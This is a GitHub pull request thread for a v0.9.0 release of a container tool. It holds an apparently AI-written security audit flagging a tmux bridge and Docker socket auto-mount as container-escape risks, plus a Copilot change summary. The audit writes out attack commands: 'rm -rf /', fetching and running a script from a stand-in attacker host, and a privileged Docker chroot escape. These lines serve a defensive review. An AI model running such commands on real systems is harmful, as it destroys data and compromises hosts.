chore: release v0.9.0

[lroolle]

Release v0.9.0

Added

• tmux bridge for container-to-host tmux control
• Gemini agent support
• Docker-in-Docker auto-mount
• Version management scripts
• Build resilience (gh api vs curl)

Fixed

• usermod error handling for mounted volumes
• chmod 755 for script permissions

See CHANGELOG.md for full details.

[claude-yolo]

Claude finished @lroolle's task in 1m 37s —— View job

---

Security Audit Results - BLOCKING CRITICAL ISSUES FOUND 🛑

Audit Checklist:

• Analyze changed files (CHANGELOG.md, deva.sh)
• Review tmux bridge implementation for container escape risks
• Examine Docker-in-Docker auto-mount security implications
• Check authentication flow bypasses
• Identify shell injection vectors
• Assess privilege escalation paths
• Document blocking issues and required tests

---

🔴 CRITICAL SECURITY ISSUES - MUST FIX BEFORE MERGE

1. CONTAINER ESCAPE: tmux Bridge (SEVERITY: CRITICAL)

• Location: scripts/deva-bridge-tmux-host, scripts/deva-bridge-tmux
• Issue: Intentional container escape mechanism via tmux control
• Impact: Container can execute arbitrary commands on host via tmux send-keys, tmux run-shell
• Code Evidence: Line 12-14 in both scripts explicitly warn "Container gains full tmux control"
• Risk: Complete host compromise despite containerization

Attack Vector:

# From inside container
deva-bridge-tmux &
tmux -S /tmp/host-tmux.sock send-keys -t 0 'rm -rf /' Enter
tmux -S /tmp/host-tmux.sock run-shell 'curl attacker.com/malware.sh | bash'

2. PRIVILEGE ESCALATION: Docker Socket Auto-Mount (SEVERITY: CRITICAL)

• Location: deva.sh:662, documented in AGENTS.md:138-149
• Issue: /var/run/docker.sock auto-mounted by default
• Impact: Root-equivalent access to host, container escape via privileged containers
• Code Evidence: DOCKER_ARGS+=(-v "/var/run/docker.sock:/var/run/docker.sock")
• Mitigation: Requires explicit opt-out (--no-docker or DEVA_NO_DOCKER=1)

Attack Vector:

# From inside container with Docker socket
docker run --privileged -v /:/host alpine chroot /host /bin/bash

🟠 HIGH RISK FINDINGS

3. Authentication Bypass Paths

• Gemini Agent: agents/gemini.sh:21 - Hardcoded --yolo flag bypasses all safety prompts
• Path Traversal: agents/gemini.sh:58-70 - Insufficient CONFIG_ROOT validation allows ../ attacks
• Credential Exposure: Multiple environment variables leaked to container without encryption

4. Shell Injection Vectors

• tmux Socket: scripts/deva-bridge-tmux:131 - rm -f "$LOCAL_SOCK" without proper quoting
• Environment Variables: All DEVA_BRIDGE_* variables passed through without sanitization
• File Operations: Multiple chmod, mkdir operations using user-controlled paths

🟡 MEDIUM RISK FINDINGS

5. Error Handling Bypass

• usermod suppression: docker-entrypoint.sh:196,207 - 2>/dev/null || true masks security failures
• Silent failures: UID/GID changes may fail silently but container continues execution

⚠️ REQUIRED SECURITY TESTS BEFORE MERGE

1. Container Escape Testing:

   • Verify tmux bridge can execute host commands
   • Test Docker socket privilege escalation
   • Confirm nested container breakout scenarios

2. Authentication Security:

   • Test path traversal attacks via CONFIG_ROOT
   • Verify credential isolation between agents
   • Check for token/key leakage in logs

3. Input Validation:

   • Fuzz all environment variables with shell metacharacters
   • Test socket path injection attacks
   • Verify proper sanitization of user inputs

📋 BLOCKING REQUIREMENTS

This PR MUST NOT be merged until:

1. ✅ Explicit Security Acknowledgment - Add prominent warnings that these features intentionally weaken container boundaries
2. ✅ Documentation Updates - Security implications must be clearly documented with attack scenarios
3. ✅ Default Safety - tmux bridge and Docker socket mounting MUST be opt-in, not auto-enabled
4. ✅ Input Sanitization - All user-controlled paths and environment variables need proper validation
5. ✅ Audit Trail - Add logging for all privilege bridge usage

🎯 Recommendation: REJECT until security mitigations implemented

The tmux bridge and Docker socket auto-mount fundamentally compromise Deva's "container as sandbox" security model. While documented as intentional, the current implementation lacks sufficient safeguards against misuse.

Fix Priority:

1. Make bridges opt-in only (require explicit --enable-tmux-bridge, --enable-docker)
2. Add input validation and proper error handling
3. Implement usage auditing and warnings
4. Update documentation with clear attack scenarios

[Copilot]

Pull request overview

This is a release preparation PR that bumps the version from 0.8.0 to 0.9.0 and updates the changelog with the new release notes dated 2026-01-08.

• Version number updated from 0.8.0 to 0.9.0 in the main script
• CHANGELOG.md updated with comprehensive release notes documenting new features (tmux bridge, Gemini agent support, Docker-in-Docker auto-mount, version management scripts) and bug fixes (usermod error handling, script permissions)

Reviewed changes

Copilot reviewed 2 out of 2 changed files in this pull request and generated no comments.

File	Description
deva.sh	Updates VERSION constant from "0.8.0" to "0.9.0"
CHANGELOG.md	Adds v0.9.0 release notes with added features, fixes, and changes; minor formatting adjustment to v0.7.0 header

---

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.